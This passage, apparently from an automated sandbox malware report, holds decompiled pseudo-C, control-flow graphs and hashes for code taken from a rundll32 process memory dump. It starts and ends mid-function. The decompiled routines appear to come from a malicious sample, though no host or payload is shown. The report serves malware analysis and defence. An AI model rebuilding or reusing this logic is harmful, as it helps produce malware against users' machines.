                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t42 = E04C396A4(_t52); // executed
                                                                                                                                                                                                                                    								__eflags = _t42;
                                                                                                                                                                                                                                    								if(_t42 != 0) {
                                                                                                                                                                                                                                    									__eflags = _v8;
                                                                                                                                                                                                                                    									_t62 = _v12;
                                                                                                                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                                                                                                                    										L29:
                                                                                                                                                                                                                                    										_t43 = E04C36786(_t58, _t62, _v8); // executed
                                                                                                                                                                                                                                    										_t51 = _t43;
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									__eflags = _t62;
                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t45 = E04C33DD9(__eflags, _t62 + 4); // executed
                                                                                                                                                                                                                                    									_t51 = _t45;
                                                                                                                                                                                                                                    									__eflags = _t51;
                                                                                                                                                                                                                                    									if(_t51 == 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t51 = 8;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t63 = _v12;
                                                                                                                                                                                                                                    						if(_t63 == 0) {
                                                                                                                                                                                                                                    							L30:
                                                                                                                                                                                                                                    							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                                                    								 *0x4c3d160();
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L34;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t64 = _t63 + 4;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    						} while (E04C3A501(_t59, _t64, 0, 1) == 0x4c7);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t51 = _t22;
                                                                                                                                                                                                                                    					L34:
                                                                                                                                                                                                                                    					return _t51;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}































                                                                                                                                                                                                                                    0x04c32368
                                                                                                                                                                                                                                    0x04c3233c
                                                                                                                                                                                                                                    0x04c32340
                                                                                                                                                                                                                                    0x04c32345
                                                                                                                                                                                                                                    0x04c3234a
                                                                                                                                                                                                                                    0x04c32351
                                                                                                                                                                                                                                    0x04c32357
                                                                                                                                                                                                                                    0x04c3235c
                                                                                                                                                                                                                                    0x04c32362
                                                                                                                                                                                                                                    0x04c32369
                                                                                                                                                                                                                                    0x04c3236b
                                                                                                                                                                                                                                    0x04c3236d
                                                                                                                                                                                                                                    0x04c3237c
                                                                                                                                                                                                                                    0x04c32382
                                                                                                                                                                                                                                    0x04c32384
                                                                                                                                                                                                                                    0x04c32389
                                                                                                                                                                                                                                    0x04c323b9
                                                                                                                                                                                                                                    0x04c323bb
                                                                                                                                                                                                                                    0x04c3238b
                                                                                                                                                                                                                                    0x04c3238b
                                                                                                                                                                                                                                    0x04c32391
                                                                                                                                                                                                                                    0x04c3239e
                                                                                                                                                                                                                                    0x04c323a4
                                                                                                                                                                                                                                    0x04c323a4
                                                                                                                                                                                                                                    0x04c323ac
                                                                                                                                                                                                                                    0x04c323b5
                                                                                                                                                                                                                                    0x04c323bc
                                                                                                                                                                                                                                    0x04c323be
                                                                                                                                                                                                                                    0x04c323c0
                                                                                                                                                                                                                                    0x04c323c7
                                                                                                                                                                                                                                    0x04c323d4
                                                                                                                                                                                                                                    0x04c323d9
                                                                                                                                                                                                                                    0x04c323de
                                                                                                                                                                                                                                    0x04c323e0
                                                                                                                                                                                                                                    0x04c323e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c323e4
                                                                                                                                                                                                                                    0x04c323e9
                                                                                                                                                                                                                                    0x04c323eb
                                                                                                                                                                                                                                    0x04c323f2
                                                                                                                                                                                                                                    0x04c323f6
                                                                                                                                                                                                                                    0x04c323f9
                                                                                                                                                                                                                                    0x04c3240e
                                                                                                                                                                                                                                    0x04c32412
                                                                                                                                                                                                                                    0x04c32417
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32417
                                                                                                                                                                                                                                    0x04c323fb
                                                                                                                                                                                                                                    0x04c323fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32403
                                                                                                                                                                                                                                    0x04c32408
                                                                                                                                                                                                                                    0x04c3240a
                                                                                                                                                                                                                                    0x04c3240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3240c
                                                                                                                                                                                                                                    0x04c323ef
                                                                                                                                                                                                                                    0x04c323ef
                                                                                                                                                                                                                                    0x04c323c0
                                                                                                                                                                                                                                    0x04c322fe
                                                                                                                                                                                                                                    0x04c322fe
                                                                                                                                                                                                                                    0x04c32303
                                                                                                                                                                                                                                    0x04c32419
                                                                                                                                                                                                                                    0x04c3241d
                                                                                                                                                                                                                                    0x04c32425
                                                                                                                                                                                                                                    0x04c32425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3241d
                                                                                                                                                                                                                                    0x04c32309
                                                                                                                                                                                                                                    0x04c3230c
                                                                                                                                                                                                                                    0x04c32316
                                                                                                                                                                                                                                    0x04c3231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3242d
                                                                                                                                                                                                                                    0x04c3242d
                                                                                                                                                                                                                                    0x04c32431
                                                                                                                                                                                                                                    0x04c32435
                                                                                                                                                                                                                                    0x04c32435

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c52ed88fe02b27c5285e3b6832d42983ed8de01b7b43e581d57219da155a9cc2
                                                                                                                                                                                                                                    • Instruction ID: 51b7eb43e38bd7d4b1f4b45f7d532cd920cd12434c147e91e51e759e63f9c329
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c52ed88fe02b27c5285e3b6832d42983ed8de01b7b43e581d57219da155a9cc2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7851F3B5A00214ABEF20DBA5DC84B6E77BAEB04717F0444A6E503E7140E779FE04AB91
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 250 4c33dd9-4c33e1b call 4c3a7bc call 4c36a12 255 4c33e21-4c33e2c 250->255 256 4c33f69-4c33f6b 250->256 259 4c33e33-4c33e35 255->259 257 4c33f6c-4c33f72 256->257 260 4c33e3b-4c33e47 call 4c3a72d 259->260 261 4c33f5c-4c33f5e 259->261 267 4c33e49 260->267 268 4c33e4c-4c33e5e call 4c3809f 260->268 262 4c33f5f-4c33f67 call 4c39039 261->262 262->257 267->268 271 4c33e64-4c33e80 call 4c3809f 268->271 272 4c33f4b-4c33f4d 268->272 277 4c33e82-4c33e9f call 4c36bfa call 4c39039 271->277 278 4c33ea1-4c33ea3 271->278 273 4c33f4e-4c33f53 272->273 273->262 275 4c33f55-4c33f5a call 4c31f99 273->275 275->262 282 4c33ea4-4c33ea6 277->282 278->282 284 4c33f41-4c33f49 call 4c39039 282->284 285 4c33eac-4c33eb3 282->285 284->273 287 4c33eb5-4c33ecc call 4c3809f 285->287 288 4c33ef4-4c33f1f call 4c38f83 call 4c31c74 285->288 297 4c33ece-4c33eeb call 4c36bfa call 4c39039 287->297 298 4c33eed-4c33eef 287->298 302 4c33f21-4c33f37 call 4c342ea 288->302 303 4c33f39-4c33f3c call 4c39039 288->303 299 4c33ef0-4c33ef2 297->299 298->299 299->284 299->288 302->303 303->284
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E04C33DD9(void* __eflags, char _a4) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char* _v20;
                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                    				char _v72;
                                                                                                                                                                                                                                    				char _v76;
                                                                                                                                                                                                                                    				char _v80;
                                                                                                                                                                                                                                    				char _v84;
                                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push(0x2c);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push( &_v84);
                                                                                                                                                                                                                                    				_v88 = 0;
                                                                                                                                                                                                                                    				L04C3A7BC();
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_t39 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    				_t5 = _t39 + 0x4c3ee40; // 0x410025
                                                                                                                                                                                                                                    				_t41 = E04C36A12(_t5);
                                                                                                                                                                                                                                    				_t75 = _t41;
                                                                                                                                                                                                                                    				_v16 = _t75;
                                                                                                                                                                                                                                    				if(_t75 == 0) {
                                                                                                                                                                                                                                    					_t70 = 8;
                                                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                                                    					return _t70;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				__imp__(_t75);
                                                                                                                                                                                                                                    				_t43 =  *0x4c3d114(_t75, _a4, _t41); // executed
                                                                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                                                                    					_t70 = 1;
                                                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                                                    					E04C39039(_t43, _v16);
                                                                                                                                                                                                                                    					goto L24;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E04C3A72D(0,  &_a4) != 0) {
                                                                                                                                                                                                                                    					_a4 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t43 = E04C3809F(0,  *0x4c3d33c);
                                                                                                                                                                                                                                    				_v12 = _t43;
                                                                                                                                                                                                                                    				if(_t43 == 0) {
                                                                                                                                                                                                                                    					_t70 = 8;
                                                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t48 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    					_t11 = _t48 + 0x4c3e81a; // 0x65696c43
                                                                                                                                                                                                                                    					_t51 = E04C3809F(0, _t11);
                                                                                                                                                                                                                                    					_t77 = _t51;
                                                                                                                                                                                                                                    					if(_t51 == 0) {
                                                                                                                                                                                                                                    						_t70 = 8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t70 = E04C36BFA(_a4, 0x80000001, _v12, _t77,  &_v88,  &_v84);
                                                                                                                                                                                                                                    						_t51 = E04C39039(_t68, _t77);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t70 != 0) {
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						_t43 = E04C39039(_t51, _v12);
                                                                                                                                                                                                                                    						L19:
                                                                                                                                                                                                                                    						_t76 = _a4;
                                                                                                                                                                                                                                    						if(_a4 != 0) {
                                                                                                                                                                                                                                    							_t43 = E04C31F99(_t76);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(( *0x4c3d260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							E04C38F83(_t70, _v88, _v84,  *0x4c3d270, 0);
                                                                                                                                                                                                                                    							_t70 = E04C31C74(_v88,  &_v80,  &_v76, 0);
                                                                                                                                                                                                                                    							if(_t70 == 0) {
                                                                                                                                                                                                                                    								_v24 = _a4;
                                                                                                                                                                                                                                    								_v20 =  &_v88;
                                                                                                                                                                                                                                    								_t70 = E04C342EA( &_v40, 0);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t51 = E04C39039(_t56, _v88);
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t60 =  *0x4c3d27c; // 0xa6a5a8
                                                                                                                                                                                                                                    						_t18 = _t60 + 0x4c3e823; // 0x65696c43
                                                                                                                                                                                                                                    						_t51 = E04C3809F(0, _t18);
                                                                                                                                                                                                                                    						_t79 = _t51;
                                                                                                                                                                                                                                    						if(_t51 == 0) {
                                                                                                                                                                                                                                    							_t70 = 8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t70 = E04C36BFA(_a4, 0x80000001, _v12, _t79,  &_v72,  &_v68);
                                                                                                                                                                                                                                    							_t51 = E04C39039(_t65, _t79);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t70 != 0) {
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}

























                                                                                                                                                                                                                                    0x04c33e69
                                                                                                                                                                                                                                    0x04c33e72
                                                                                                                                                                                                                                    0x04c33e77
                                                                                                                                                                                                                                    0x04c33e80
                                                                                                                                                                                                                                    0x04c33ea3
                                                                                                                                                                                                                                    0x04c33e82
                                                                                                                                                                                                                                    0x04c33e98
                                                                                                                                                                                                                                    0x04c33e9a
                                                                                                                                                                                                                                    0x04c33e9a
                                                                                                                                                                                                                                    0x04c33ea6
                                                                                                                                                                                                                                    0x04c33f41
                                                                                                                                                                                                                                    0x04c33f44
                                                                                                                                                                                                                                    0x04c33f4e
                                                                                                                                                                                                                                    0x04c33f4e
                                                                                                                                                                                                                                    0x04c33f53
                                                                                                                                                                                                                                    0x04c33f55
                                                                                                                                                                                                                                    0x04c33f55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33eac
                                                                                                                                                                                                                                    0x04c33eb3
                                                                                                                                                                                                                                    0x04c33ef4
                                                                                                                                                                                                                                    0x04c33f05
                                                                                                                                                                                                                                    0x04c33f1b
                                                                                                                                                                                                                                    0x04c33f1f
                                                                                                                                                                                                                                    0x04c33f24
                                                                                                                                                                                                                                    0x04c33f2a
                                                                                                                                                                                                                                    0x04c33f37
                                                                                                                                                                                                                                    0x04c33f37
                                                                                                                                                                                                                                    0x04c33f3c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33f3c
                                                                                                                                                                                                                                    0x04c33eb5
                                                                                                                                                                                                                                    0x04c33eba
                                                                                                                                                                                                                                    0x04c33ec3
                                                                                                                                                                                                                                    0x04c33ec8
                                                                                                                                                                                                                                    0x04c33ecc
                                                                                                                                                                                                                                    0x04c33eef
                                                                                                                                                                                                                                    0x04c33ece
                                                                                                                                                                                                                                    0x04c33ee4
                                                                                                                                                                                                                                    0x04c33ee6
                                                                                                                                                                                                                                    0x04c33ee6
                                                                                                                                                                                                                                    0x04c33ef2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33ef2
                                                                                                                                                                                                                                    0x04c33ea6

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b43c034868cfd7f9715bf18adf1af4f81cc67b7c048f1edb02cd01131c642014
                                                                                                                                                                                                                                    • Instruction ID: 9d387f1ebfe547c91a2c4aab81b31bbec42ba792354114a8c996ec2b7d9ed955
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b43c034868cfd7f9715bf18adf1af4f81cc67b7c048f1edb02cd01131c642014
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B415072A01258AFEB11EFE4CC84DEE7BBEEF08746F044165B905A7120D675EE449BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 310 4c3163f-4c3168b 312 4c31691-4c316bd 310->312 313 4c317af-4c317b2 310->313 319 4c316c3-4c316cf call 4c32436 312->319 320 4c317ac 312->320 314 4c317b4 313->314 315 4c317bd-4c317c0 313->315 314->315 317 4c317c2 315->317 318 4c317cb-4c317d2 315->318 317->318 319->320 323 4c316d5-4c316e5 319->323 320->313 323->320 325 4c316eb-4c31711 323->325 325->320 328 4c31717-4c3172b 325->328 330 4c31769-4c3176c 328->330 331 4c3172d-4c31730 328->331 333 4c317a3-4c317a8 330->333 334 4c3176e-4c31773 330->334 331->330 332 4c31732-4c31749 331->332 339 4c31760 332->339 340 4c3174b-4c31754 call 4c352f9 332->340 333->320 334->333 335 4c31775-4c31780 call 4c31a70 334->335 338 4c31785-4c31789 335->338 338->333 341 4c3178b-4c31790 338->341 339->330 340->339 346 4c31756-4c3175e call 4c32436 340->346 343 4c31792-4c3179c 341->343 344 4c3179e 341->344 343->333 344->333 346->339
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c02eaef508261465181cf279662d257f69d0c803da85f324da57aa78124c879d
                                                                                                                                                                                                                                    • Instruction ID: dbe9e1bb92d9f7b5050453583012f2e179f3fb0878b88ca9ce7abfb56fd25053
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c02eaef508261465181cf279662d257f69d0c803da85f324da57aa78124c879d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6951317A900209EFDB00DFE8C8849AEB7F7FF89341B188869E505EB210DB35AD45CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 349 4c36786-4c367b2 call 4c3a7bc 353 4c36913-4c36919 349->353 354 4c367b8-4c36808 call 4c3b0c8 349->354 358 4c3691c-4c36923 353->358 361 4c36883-4c36888 354->361 362 4c3680a-4c3680d 354->362 363 4c36889-4c3688d 361->363 364 4c36818 362->364 365 4c3680f call 4c373fd 362->365 366 4c3688f-4c36891 363->366 367 4c3689d-4c368a1 363->367 369 4c36822 364->369 370 4c36814-4c36816 365->370 366->367 367->363 371 4c368a3-4c368ac 367->371 372 4c36825-4c36829 369->372 370->364 370->369 371->358 373 4c3683b-4c36864 call 4c38504 372->373 374 4c3682b-4c36832 372->374 379 4c36866-4c3686f 373->379 380 4c368ae-4c368b3 373->380 374->373 376 4c36834 374->376 376->373 379->372 381 4c36871-4c36880 call 4c33bf1 379->381 382 4c368d2-4c368da 380->382 383 4c368b5-4c368bb 380->383 381->361 385 4c368e0-4c368f3 call 4c3b0c8 382->385 383->361 386 4c368bd-4c368d0 call 4c3a1b0 383->386 392 4c368f8-4c36908 385->392 386->385 392->372 394 4c3690e 392->394 394->361
                                                                                                                                                                                                                                    C-Code - Quality: 21%
                                                                                                                                                                                                                                    			E04C36786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                                    				char _v92;
                                                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                                                                                    				char _t55;
                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                    				intOrPtr* _t64;
                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t44 =  &_v88;
                                                                                                                                                                                                                                    				_v92 = 0;
                                                                                                                                                                                                                                    				L04C3A7BC();
                                                                                                                                                                                                                                    				__imp__(0, 1, 0, _t44, 0, 0x2c);
                                                                                                                                                                                                                                    				_v44 = _t44;
                                                                                                                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					_v8 = _t44;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                    					L04C3B0C8();
                                                                                                                                                                                                                                    					_t72 = __imp__; // 0x76d7f710
                                                                                                                                                                                                                                    					_v36 = _t44;
                                                                                                                                                                                                                                    					_v32 = __edx;
                                                                                                                                                                                                                                    					 *_t72(_v44,  &_v36, 0, 0, 0, 0,  *0x4c3d240, 0, 0xff676980, 0xffffffff);
                                                                                                                                                                                                                                    					_t48 =  *0x4c3d26c; // 0xbc
                                                                                                                                                                                                                                    					_t64 = __imp__; // 0x76d7f730
                                                                                                                                                                                                                                    					_v40 = _t48;
                                                                                                                                                                                                                                    					_t50 =  *_t64(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                    					_v8 = _t50;
                                                                                                                                                                                                                                    					if(_t50 == 0) {
                                                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                                                    							 *0x4c3d24c = 5;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t63 = E04C373FD(__edx); // executed
                                                                                                                                                                                                                                    							if(_t63 != 0) {
                                                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						if(_v12 == 1 && ( *0x4c3d260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							_v12 = 2;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t66 = _v12;
                                                                                                                                                                                                                                    						_t53 = _t66 << 4;
                                                                                                                                                                                                                                    						_t71 = _t75 + (_t66 << 4) - 0x54;
                                                                                                                                                                                                                                    						_t67 = _t66 + 1;
                                                                                                                                                                                                                                    						_v24 = _t66 + 1;
                                                                                                                                                                                                                                    						_t55 = E04C38504(_t75 + _t53 - 0x58, _t66 + 1, _t67, _t75 + _t53 - 0x58, _t71,  &_v20,  &_v16); // executed
                                                                                                                                                                                                                                    						_v8 = _t55;
                                                                                                                                                                                                                                    						if(_t55 != 0) {
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t60 = _v24;
                                                                                                                                                                                                                                    						_t85 = _t60 - 3;
                                                                                                                                                                                                                                    						_v12 = _t60;
                                                                                                                                                                                                                                    						if(_t60 != 3) {
                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v8 = E04C33BF1(_t67, _t85,  &_v92, _a4, _a8);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						__eflags = _t55 - 0x10d2;
                                                                                                                                                                                                                                    						if(_t55 != 0x10d2) {
                                                                                                                                                                                                                                    							_push(0xffffffff);
                                                                                                                                                                                                                                    							_push(0xff676980);
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push( *0x4c3d244);
                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							__eflags =  *0x4c3d248; // 0x0
                                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t55 = E04C3A1B0();
                                                                                                                                                                                                                                    								_push(0xffffffff);
                                                                                                                                                                                                                                    								_push(0xdc3cba00);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_push( *0x4c3d248);
                                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                                    								L04C3B0C8();
                                                                                                                                                                                                                                    								_v36 = _t55;
                                                                                                                                                                                                                                    								_v32 = _t71;
                                                                                                                                                                                                                                    								 *_t72(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                    								_t59 =  *_t64(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                                                    								_v8 = _t59;
                                                                                                                                                                                                                                    								if(_t59 == 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_t73 =  &_v92;
                                                                                                                                                                                                                                    					_t65 = 3;
                                                                                                                                                                                                                                    					do {
